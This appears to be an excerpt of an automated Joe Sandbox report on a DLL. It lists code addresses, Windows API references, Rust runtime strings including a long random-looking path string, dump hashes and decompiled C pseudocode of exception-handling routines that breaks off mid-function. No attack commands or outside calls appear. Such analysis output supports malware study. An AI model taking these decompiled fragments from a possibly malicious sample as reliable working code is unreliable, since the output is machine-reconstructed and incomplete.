                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc48
                                                                                                                                                                                      0x6e9dcc4b
                                                                                                                                                                                      0x6e9dcc4e
                                                                                                                                                                                      0x6e9dccf8
                                                                                                                                                                                      0x6e9dccfe
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd12
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd2d
                                                                                                                                                                                      0x6e9dcd35
                                                                                                                                                                                      0x6e9dcd38
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc907
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc910
                                                                                                                                                                                      0x6e9dc913
                                                                                                                                                                                      0x6e9dc915
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc925
                                                                                                                                                                                      0x6e9dca0d
                                                                                                                                                                                      0x6e9dca10
                                                                                                                                                                                      0x6e9dca1e
                                                                                                                                                                                      0x6e9dca20
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca26
                                                                                                                                                                                      0x6e9dca29
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x6e9dc92b
                                                                                                                                                                                      0x6e9dc92e
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x6e9dcd00
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x6e9dcc54
                                                                                                                                                                                      0x6e9dcc57
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc5d
                                                                                                                                                                                      0x6e9dcc60
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc66
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x6e9dcc18
                                                                                                                                                                                      0x6e9dcc1d
                                                                                                                                                                                      0x6e9dcc1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc21
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca57
                                                                                                                                                                                      0x6e9dca5a
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca5
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dccab
                                                                                                                                                                                      0x6e9dccb1
                                                                                                                                                                                      0x6e9dccb8
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dccc5
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x6e9dcccd
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dca60
                                                                                                                                                                                      0x6e9dca67
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dc95c
                                                                                                                                                                                      0x6e9dc95f
                                                                                                                                                                                      0x6e9dc961
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc967
                                                                                                                                                                                      0x6e9dc96a
                                                                                                                                                                                      0x6e9dc96d
                                                                                                                                                                                      0x6e9dcbf6
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x6e9dc973
                                                                                                                                                                                      0x6e9dc979
                                                                                                                                                                                      0x6e9dc97e
                                                                                                                                                                                      0x6e9dc980
                                                                                                                                                                                      0x6e9dc983
                                                                                                                                                                                      0x6e9dc98a
                                                                                                                                                                                      0x6e9dc98f
                                                                                                                                                                                      0x6e9dc992
                                                                                                                                                                                      0x6e9dc994
                                                                                                                                                                                      0x6e9dc997
                                                                                                                                                                                      0x6e9dc999
                                                                                                                                                                                      0x6e9dc99b
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a0
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9ab
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b8
                                                                                                                                                                                      0x6e9dc9bb
                                                                                                                                                                                      0x6e9dc9be
                                                                                                                                                                                      0x6e9dcce0
                                                                                                                                                                                      0x6e9dcce6
                                                                                                                                                                                      0x6e9dcce8
                                                                                                                                                                                      0x6e9dcce8
                                                                                                                                                                                      0x6e9dcceb
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea7
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dca70
                                                                                                                                                                                      0x6e9dca77
                                                                                                                                                                                      0x6e9dca7e
                                                                                                                                                                                      0x6e9dca85
                                                                                                                                                                                      0x6e9dca8c
                                                                                                                                                                                      0x6e9dca90
                                                                                                                                                                                      0x6e9dca97
                                                                                                                                                                                      0x6e9dca9e
                                                                                                                                                                                      0x6e9dcaa5
                                                                                                                                                                                      0x6e9dcaad
                                                                                                                                                                                      0x6e9dcab0
                                                                                                                                                                                      0x6e9dcab6
                                                                                                                                                                                      0x6e9dcab9
                                                                                                                                                                                      0x6e9dcabf
                                                                                                                                                                                      0x6e9dcac5
                                                                                                                                                                                      0x6e9dcacc
                                                                                                                                                                                      0x6e9dcad5
                                                                                                                                                                                      0x6e9dcadc
                                                                                                                                                                                      0x6e9dcae2
                                                                                                                                                                                      0x6e9dcae9
                                                                                                                                                                                      0x6e9dcaec
                                                                                                                                                                                      0x6e9dcafa
                                                                                                                                                                                      0x6e9dcb01
                                                                                                                                                                                      0x6e9dcb09
                                                                                                                                                                                      0x6e9dcb0c
                                                                                                                                                                                      0x6e9dcb0e
                                                                                                                                                                                      0x6e9dcb11
                                                                                                                                                                                      0x6e9dcb14
                                                                                                                                                                                      0x6e9dcb1b
                                                                                                                                                                                      0x6e9dcb1d
                                                                                                                                                                                      0x6e9dcb23
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb44
                                                                                                                                                                                      0x6e9dcb55
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dcd4b
                                                                                                                                                                                      0x6e9dcd5a
                                                                                                                                                                                      0x6e9dcd61
                                                                                                                                                                                      0x6e9dcd68
                                                                                                                                                                                      0x6e9dcd72
                                                                                                                                                                                      0x6e9dcd75
                                                                                                                                                                                      0x6e9dcd7c
                                                                                                                                                                                      0x6e9dcd83
                                                                                                                                                                                      0x6e9dcd89
                                                                                                                                                                                      0x6e9dcd90
                                                                                                                                                                                      0x6e9dcd93
                                                                                                                                                                                      0x6e9dcd9a
                                                                                                                                                                                      0x6e9dcd9f
                                                                                                                                                                                      0x6e9dcda8
                                                                                                                                                                                      0x6e9dcdae
                                                                                                                                                                                      0x6e9dcdb1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdb8
                                                                                                                                                                                      0x6e9dcdc0
                                                                                                                                                                                      0x6e9dcdc3
                                                                                                                                                                                      0x6e9dcdc5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb60
                                                                                                                                                                                      0x6e9dcb63
                                                                                                                                                                                      0x6e9dce00
                                                                                                                                                                                      0x6e9dce03
                                                                                                                                                                                      0x6e9dce05
                                                                                                                                                                                      0x6e9dce07
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce17
                                                                                                                                                                                      0x6e9dce1d
                                                                                                                                                                                      0x6e9dce23
                                                                                                                                                                                      0x6e9dce25
                                                                                                                                                                                      0x6e9dce27
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce39
                                                                                                                                                                                      0x6e9dce3f
                                                                                                                                                                                      0x6e9dce43
                                                                                                                                                                                      0x6e9dce4a
                                                                                                                                                                                      0x6e9dce52
                                                                                                                                                                                      0x6e9dce59
                                                                                                                                                                                      0x6e9dce60
                                                                                                                                                                                      0x6e9dce67
                                                                                                                                                                                      0x6e9dce6e
                                                                                                                                                                                      0x6e9dce72
                                                                                                                                                                                      0x6e9dce79
                                                                                                                                                                                      0x6e9dce80
                                                                                                                                                                                      0x6e9dce88
                                                                                                                                                                                      0x6e9dce8b
                                                                                                                                                                                      0x6e9dce8e
                                                                                                                                                                                      0x6e9dce93
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce97
                                                                                                                                                                                      0x6e9dce9b
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x6e9dcb6b
                                                                                                                                                                                      0x6e9dcb71
                                                                                                                                                                                      0x6e9dcb73
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb7c
                                                                                                                                                                                      0x6e9dcb7f
                                                                                                                                                                                      0x6e9dcb86
                                                                                                                                                                                      0x6e9dcb8d
                                                                                                                                                                                      0x6e9dcb94
                                                                                                                                                                                      0x6e9dcb9b
                                                                                                                                                                                      0x6e9dcba2
                                                                                                                                                                                      0x6e9dcbb0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbbb
                                                                                                                                                                                      0x6e9dcbbe
                                                                                                                                                                                      0x6e9dcbc6
                                                                                                                                                                                      0x6e9dcbc8
                                                                                                                                                                                      0x6e9dcdc8
                                                                                                                                                                                      0x6e9dcdcb
                                                                                                                                                                                      0x6e9dcdd2
                                                                                                                                                                                      0x6e9dcddb
                                                                                                                                                                                      0x6e9dcddd
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dc7bf

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9DC700: AcquireSRWLockShared.KERNEL32(6EA2E11C), ref: 6E9DC785
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DC8DC
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DC8EA
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DC94D
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DCB31
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DCB3F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E9DCC00
                                                                                                                                                                                      • cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6E9DC74D, 6E9DC7C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeHeap$AcquireLockSharedValue
                                                                                                                                                                                      • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
                                                                                                                                                                                      • API String ID: 942675266-716947571
                                                                                                                                                                                      • Opcode ID: 7bda7ee4f025edb1cb2fae988b1c64033e79d8c7b012b34688b3d6bd02c0f3a4
                                                                                                                                                                                      • Instruction ID: b60c11e8d4fe5f43c3c19266498d1ed26c07e56518d337e21d8a55f65fc2f9ba
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bda7ee4f025edb1cb2fae988b1c64033e79d8c7b012b34688b3d6bd02c0f3a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 250245B0904A299FDB10CFE4C954BDEBBB9BF49304F208529D415AB380D775E94ACF94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                                      			E6E9EF6F6(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                                                                                                                                                      				signed char* _v0;
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                      				void _v64;
                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                      				char _v84;
                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                                                      				void _v104;
                                                                                                                                                                                      				intOrPtr* _v112;
                                                                                                                                                                                      				signed char* _v184;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t202;
                                                                                                                                                                                      				signed int _t203;
                                                                                                                                                                                      				char _t204;
                                                                                                                                                                                      				signed int _t206;
                                                                                                                                                                                      				signed int _t208;
                                                                                                                                                                                      				signed char* _t209;
                                                                                                                                                                                      				signed int _t210;
                                                                                                                                                                                      				signed int _t211;
                                                                                                                                                                                      				signed int _t215;
                                                                                                                                                                                      				void* _t218;
                                                                                                                                                                                      				signed char* _t221;
                                                                                                                                                                                      				void* _t223;
                                                                                                                                                                                      				void* _t225;
                                                                                                                                                                                      				signed char _t229;
                                                                                                                                                                                      				signed int _t230;
                                                                                                                                                                                      				void* _t232;
                                                                                                                                                                                      				void* _t235;
                                                                                                                                                                                      				void* _t238;
                                                                                                                                                                                      				signed char _t245;
                                                                                                                                                                                      				signed int _t250;
                                                                                                                                                                                      				void* _t253;
                                                                                                                                                                                      				signed int* _t255;
                                                                                                                                                                                      				signed int _t256;
                                                                                                                                                                                      				intOrPtr _t257;
                                                                                                                                                                                      				signed int _t258;
                                                                                                                                                                                      				void* _t263;
                                                                                                                                                                                      				void* _t268;
                                                                                                                                                                                      				void* _t269;
                                                                                                                                                                                      				signed int _t273;
                                                                                                                                                                                      				signed char* _t274;
                                                                                                                                                                                      				intOrPtr* _t275;
                                                                                                                                                                                      				signed char _t276;
                                                                                                                                                                                      				signed int _t277;
                                                                                                                                                                                      				signed int _t278;
                                                                                                                                                                                      				intOrPtr* _t280;
                                                                                                                                                                                      				signed int _t281;
                                                                                                                                                                                      				signed int _t282;
                                                                                                                                                                                      				signed int _t287;
                                                                                                                                                                                      				signed int _t294;
                                                                                                                                                                                      				signed int _t295;
                                                                                                                                                                                      				signed int _t298;
                                                                                                                                                                                      				signed int _t300;
                                                                                                                                                                                      				signed char* _t301;
                                                                                                                                                                                      				signed int _t302;
                                                                                                                                                                                      				signed int _t303;
                                                                                                                                                                                      				signed int* _t305;
                                                                                                                                                                                      				signed char* _t308;
                                                                                                                                                                                      				signed int _t318;
                                                                                                                                                                                      				signed int _t319;
                                                                                                                                                                                      				signed int _t321;
                                                                                                                                                                                      				signed int _t330;
                                                                                                                                                                                      				void* _t332;
                                                                                                                                                                                      				void* _t334;
                                                                                                                                                                                      				void* _t335;
                                                                                                                                                                                      				void* _t336;
                                                                                                                                                                                      				void* _t337;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t300 = __edx;
                                                                                                                                                                                      				_push(_t319);
                                                                                                                                                                                      				_t305 = _a20;
                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                      				_v28 = 0;
                                                                                                                                                                                      				_t279 = E6E9F0658(_a8, _a16, _t305);
                                                                                                                                                                                      				_t335 = _t334 + 0xc;
                                                                                                                                                                                      				_v12 = _t279;
                                                                                                                                                                                      				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
                                                                                                                                                                                      					L66:
                                                                                                                                                                                      					_t202 = E6E9F1C23(_t274, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      					asm("int3");
                                                                                                                                                                                      					_t332 = _t335;
                                                                                                                                                                                      					_t336 = _t335 - 0x38;
                                                                                                                                                                                      					_push(_t274);
                                                                                                                                                                                      					_t275 = _v112;
                                                                                                                                                                                      					__eflags =  *_t275 - 0x80000003;
                                                                                                                                                                                      					if( *_t275 == 0x80000003) {
                                                                                                                                                                                      						return _t202;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_push(_t319);
                                                                                                                                                                                      						_push(_t305);
                                                                                                                                                                                      						_t203 = E6E9EF3B1(_t275, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      						__eflags =  *(_t203 + 8);
                                                                                                                                                                                      						if( *(_t203 + 8) != 0) {
                                                                                                                                                                                      							__imp__EncodePointer(0);
                                                                                                                                                                                      							_t319 = _t203;
                                                                                                                                                                                      							_t223 = E6E9EF3B1(_t275, _t279, _t300, 0, _t319);
                                                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
                                                                                                                                                                                      							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
                                                                                                                                                                                      								__eflags =  *_t275 - 0xe0434f4d;
                                                                                                                                                                                      								if( *_t275 != 0xe0434f4d) {
                                                                                                                                                                                      									__eflags =  *_t275 - 0xe0434352;
                                                                                                                                                                                      									if( *_t275 != 0xe0434352) {
                                                                                                                                                                                      										_t215 = E6E9EEBF7(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
                                                                                                                                                                                      										_t336 = _t336 + 0x1c;
                                                                                                                                                                                      										__eflags = _t215;
                                                                                                                                                                                      										if(_t215 != 0) {
                                                                                                                                                                                      											L83:
                                                                                                                                                                                      											return _t215;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t204 = _a16;
                                                                                                                                                                                      						_v28 = _t204;
                                                                                                                                                                                      						_v24 = 0;
                                                                                                                                                                                      						__eflags =  *(_t204 + 0xc);
                                                                                                                                                                                      						if( *(_t204 + 0xc) > 0) {
                                                                                                                                                                                      							_push(_a24);
                                                                                                                                                                                      							E6E9EEB2A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
                                                                                                                                                                                      							_t302 = _v40;
                                                                                                                                                                                      							_t337 = _t336 + 0x18;
                                                                                                                                                                                      							_t215 = _v44;
                                                                                                                                                                                      							_v20 = _t215;
                                                                                                                                                                                      							_v12 = _t302;
                                                                                                                                                                                      							__eflags = _t302 - _v32;
                                                                                                                                                                                      							if(_t302 >= _v32) {
                                                                                                                                                                                      								goto L83;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t281 = _t302 * 0x14;
                                                                                                                                                                                      							__eflags = _t281;
                                                                                                                                                                                      							_v16 = _t281;
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								_t282 = 5;
                                                                                                                                                                                      								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
                                                                                                                                                                                      								_t337 = _t337 + 0xc;
                                                                                                                                                                                      								__eflags = _v64 - _t218;
                                                                                                                                                                                      								if(_v64 > _t218) {
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t218 - _v60;
                                                                                                                                                                                      								if(_t218 > _v60) {
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
                                                                                                                                                                                      								_t287 = _t221[4];
                                                                                                                                                                                      								__eflags = _t287;
                                                                                                                                                                                      								if(_t287 == 0) {
                                                                                                                                                                                      									L80:
                                                                                                                                                                                      									__eflags =  *_t221 & 0x00000040;
                                                                                                                                                                                      									if(( *_t221 & 0x00000040) == 0) {
                                                                                                                                                                                      										_push(0);
                                                                                                                                                                                      										_push(1);
                                                                                                                                                                                      										E6E9EF676(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
                                                                                                                                                                                      										_t302 = _v12;
                                                                                                                                                                                      										_t337 = _t337 + 0x30;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *((char*)(_t287 + 8));
                                                                                                                                                                                      								if( *((char*)(_t287 + 8)) != 0) {
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L80;
                                                                                                                                                                                      								L82:
                                                                                                                                                                                      								_t302 = _t302 + 1;
                                                                                                                                                                                      								_t215 = _v20;
                                                                                                                                                                                      								_t281 = _v16 + 0x14;
                                                                                                                                                                                      								_v12 = _t302;
                                                                                                                                                                                      								_v16 = _t281;
                                                                                                                                                                                      								__eflags = _t302 - _v32;
                                                                                                                                                                                      							} while (_t302 < _v32);
                                                                                                                                                                                      							goto L83;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E6E9F1C23(_t275, _t279, _t300, 0, _t319);
                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                      						_push(_t332);
                                                                                                                                                                                      						_t301 = _v184;
                                                                                                                                                                                      						_push(_t275);
                                                                                                                                                                                      						_push(_t319);
                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                      						_t206 = _t301[4];
                                                                                                                                                                                      						__eflags = _t206;
                                                                                                                                                                                      						if(_t206 == 0) {
                                                                                                                                                                                      							L108:
                                                                                                                                                                                      							_t208 = 1;
                                                                                                                                                                                      							__eflags = 1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t280 = _t206 + 8;
                                                                                                                                                                                      							__eflags =  *_t280;
                                                                                                                                                                                      							if( *_t280 == 0) {
                                                                                                                                                                                      								goto L108;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eflags =  *_t301 & 0x00000080;
                                                                                                                                                                                      								_t308 = _v0;
                                                                                                                                                                                      								if(( *_t301 & 0x00000080) == 0) {
                                                                                                                                                                                      									L90:
                                                                                                                                                                                      									_t276 = _t308[4];
                                                                                                                                                                                      									_t321 = 0;
                                                                                                                                                                                      									__eflags = _t206 - _t276;
                                                                                                                                                                                      									if(_t206 == _t276) {
                                                                                                                                                                                      										L100:
                                                                                                                                                                                      										__eflags =  *_t308 & 0x00000002;
                                                                                                                                                                                      										if(( *_t308 & 0x00000002) == 0) {
                                                                                                                                                                                      											L102:
                                                                                                                                                                                      											_t209 = _a4;
                                                                                                                                                                                      											__eflags =  *_t209 & 0x00000001;
                                                                                                                                                                                      											if(( *_t209 & 0x00000001) == 0) {
                                                                                                                                                                                      												L104:
                                                                                                                                                                                      												__eflags =  *_t209 & 0x00000002;
                                                                                                                                                                                      												if(( *_t209 & 0x00000002) == 0) {
                                                                                                                                                                                      													L106:
                                                                                                                                                                                      													_t321 = 1;
                                                                                                                                                                                      													__eflags = 1;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eflags =  *_t301 & 0x00000002;
                                                                                                                                                                                      													if(( *_t301 & 0x00000002) != 0) {
                                                                                                                                                                                      														goto L106;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags =  *_t301 & 0x00000001;
                                                                                                                                                                                      												if(( *_t301 & 0x00000001) != 0) {
                                                                                                                                                                                      													goto L104;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											__eflags =  *_t301 & 0x00000008;
                                                                                                                                                                                      											if(( *_t301 & 0x00000008) != 0) {
                                                                                                                                                                                      												goto L102;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t208 = _t321;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t185 = _t276 + 8; // 0x6e
                                                                                                                                                                                      										_t210 = _t185;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											_t277 =  *_t280;
                                                                                                                                                                                      											__eflags = _t277 -  *_t210;
                                                                                                                                                                                      											if(_t277 !=  *_t210) {
                                                                                                                                                                                      												break;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = _t277;
                                                                                                                                                                                      											if(_t277 == 0) {
                                                                                                                                                                                      												L96:
                                                                                                                                                                                      												_t211 = _t321;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t278 =  *((intOrPtr*)(_t280 + 1));
                                                                                                                                                                                      												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
                                                                                                                                                                                      												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t280 = _t280 + 2;
                                                                                                                                                                                      													_t210 = _t210 + 2;
                                                                                                                                                                                      													__eflags = _t278;
                                                                                                                                                                                      													if(_t278 != 0) {
                                                                                                                                                                                      														continue;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L96;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L98:
                                                                                                                                                                                      											__eflags = _t211;
                                                                                                                                                                                      											if(_t211 == 0) {
                                                                                                                                                                                      												goto L100;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t208 = 0;
